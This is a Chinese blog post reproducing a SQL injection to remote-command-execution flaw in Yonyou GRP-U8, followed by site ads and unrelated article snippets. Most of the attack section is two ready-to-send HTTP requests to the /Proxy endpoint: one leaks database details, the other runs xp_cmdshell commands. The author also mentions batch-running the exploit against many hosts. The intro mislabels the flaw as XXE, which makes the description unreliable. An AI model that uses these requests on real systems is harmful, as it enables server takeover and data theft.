用友GRP-u8 注入-RCE漏洞复现

摘要:
用友GRP-u8注入-RCE漏洞复现一、漏洞简介用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。˃XMLAS_DataRequestProviderNameDataSetProviderDataDataselectuser,db_name(),host_name(),@@version验证过程批量跑了一部分现在估计没啥了Rce注入EXPPOST/ProxyHTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests:1User-Agent:Mozilla/5.0AppleWebKit/537.36Chrome/85.0.4183.102Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding:gzip,deflateAccept-Language:zh-CN,zh;q=0.9,en;q=0.8Cookie:JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0Connection:closeContent-Type:application/x-www-form-urlencodedContent-Length:355cVer=9.8.0&dp=XMLAS_DataRequestProviderNameDataSetProviderDataDataexecxp_cmdshell'ipconfig'参考:https://www.cnblogs.com/0day-li/p/13652897.htmlhttps://www.uedbox.com/post/14953/https://www.cnblogs.com/Yang34/p/13653960.html免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!商业转载请联系作者获得授权,非商业转载请注明出处。

用友GRP-u8 注入-RCE漏洞复现第1张用友GRP-u8 注入-RCE漏洞复现第2张

​用友GRP-u8 注入-RCE漏洞复现

(HW第一时间复现了,当时觉得不合适,现在才发出来)


一、漏洞简介

用友GRP-u8存在XXE漏洞,该漏洞源于应用程序解析XML输入时没有进制外部实体的加载,导致可加载恶意外部文件。

二、漏洞复现

SQL注入POC

POST /Proxy HTTP/1.1Host:localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 371cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">select user,db_name(),host_name(),@@version</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

验证过程

用友GRP-u8 注入-RCE漏洞复现第3张用友GRP-u8 注入-RCE漏洞复现第2张

用友GRP-u8 注入-RCE漏洞复现第5张用友GRP-u8 注入-RCE漏洞复现第2张

批量跑了一部分(这个是HW期间第一时间跑的)现在估计没啥了

用友GRP-u8 注入-RCE漏洞复现第7张用友GRP-u8 注入-RCE漏洞复现第2张

Rce注入EXP

POST /Proxy HTTP/1.1Host: localhost:8080Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.102 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Accept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.9,en;q=0.8Cookie: JSESSIONID=25EDA97813692F4D1FAFBB74FD7CFFE0Connection: closeContent-Type: application/x-www-form-urlencodedContent-Length: 355cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'ipconfig'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>

用友GRP-u8 注入-RCE漏洞复现第9张用友GRP-u8 注入-RCE漏洞复现第2张

用友GRP-u8 注入-RCE漏洞复现第11张用友GRP-u8 注入-RCE漏洞复现第2张

参考:

https://www.cnblogs.com/0day-li/p/13652897.html

https://www.uedbox.com/post/14953/

https://www.cnblogs.com/Yang34/p/13653960.html


免责声明:本站提供安全工具、程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

转载声明:著作权归作者所有。商业转载请联系作者获得授权,非商业转载请注明出处。

订阅查看更多复现文章、学习笔记

thelostworld

安全路上,与你并肩前行!!!!

用友GRP-u8 注入-RCE漏洞复现第13张用友GRP-u8 注入-RCE漏洞复现第2张

个人知乎:https://www.zhihu.com/people/fu-wei-43-69/columns

个人简书:https://www.jianshu.com/u/bf0e38a8d400

个人CSDN:https://blog.csdn.net/qq_37602797/category_10169006.html

个人博客园:https://www.cnblogs.com/thelostworld/

用友GRP-u8 注入-RCE漏洞复现第15张用友GRP-u8 注入-RCE漏洞复现第2张

免责声明:文章转载自《用友GRP-u8 注入-RCE漏洞复现》仅用于学习参考。如对内容有疑问,请及时联系本站处理。

上篇【原】无脑操作:Chrome浏览器安装Vue.js devtoolwindows 编程钩子技术初尝(hook)下篇

宿迁高防,2C2G15M,22元/月;香港BGP,2C5G5M,25元/月 雨云优惠码:MjYwNzM=

相关文章

配置Tomcat的server.xml编码为UTF-8时,再次发布项目,编码自动还原问题?

当我们在处理中文乱码或是配置数据源时,我们要修改Tomcat下的server.xml 但是当我们修改完后重启Tomcat服务器时发现xml文件又被还原了,修改无效果。 为什么会还原? Tomcat服务器在Eclipse中启动时,会自动发布Eclipse中部署的项目,但是我的项目是自己手动在外面部署的,Eclipse只认得在它里面部署的项目,因此它会创建一个...

为什么多 TCP 连接比单 TCP 连接传输快

转自: 我观察到,客户端机器从单一服务器使用 HTTP 下载一个文件:1. 单连接下载,速度没有达到客户端网络的最大带宽;2. 多连接同时下载,传输速度有极大的提高,带宽被占满。假设如下前提:1. 服务器是单一的,没有使用提供相同文件的其它服务器,也没有使用同域名的其它服务器;2. 服务器不对单个连接限速。那么,是什么导致多连接下载的速度大为提高呢?换一种...

嵌入式开发之web---vue-demo webstorm goahead 嵌入式智能设备

1.先按上篇https://www.cnblogs.com/pengkunfan/p/12622238.html 安装好nodejs和npm,创建好my_vue工程 cmd命令下检查node ,npm版本是否正确 node -v npm -v vue init webpack my_vue https://blog.csdn.net/silenmm/art...

Web Service学习之八:Soap消息详解

一、区别概念   WSDL是网络服务描述语言,是XML文档;它包含一系列描述某个web service的定义或者说是规则。尤其是定义了传输Sope消息的结构   Soap:简单对象访问协议,是交换数据的一种协议规范,是一种轻量的、简单的、基于XML的协议,它被设计成在WEB上交换结构化的和固化的信息,应用程序通过 HTTP 来交换信息。在Web Servi...

live-server使用指南

一、安装 npm -g install live-server 二、配置 --port=NUMBER` - 选择要使用的端口,默认值:PORT env var或8080--host=ADDRESS` - 选择要绑定的主机地址,默认值:IP env var或0.0.0.0(“任意地址”)--no-browser` - 禁止自动Web浏览器启动--browse...

nginx反向代理+负载均衡+https

  A服务器(192.168.133.1)作为nginx代理服务器   B服务器(192.168.133.2)作为后端真实服务器 访问https://www.test.com请求从A服务器上反向代理到B服务器上 A服务器192.168.133.1的操作流程 1)编译安装nginx省略 2)配置nginx cd /usr/local/nginx/conf v...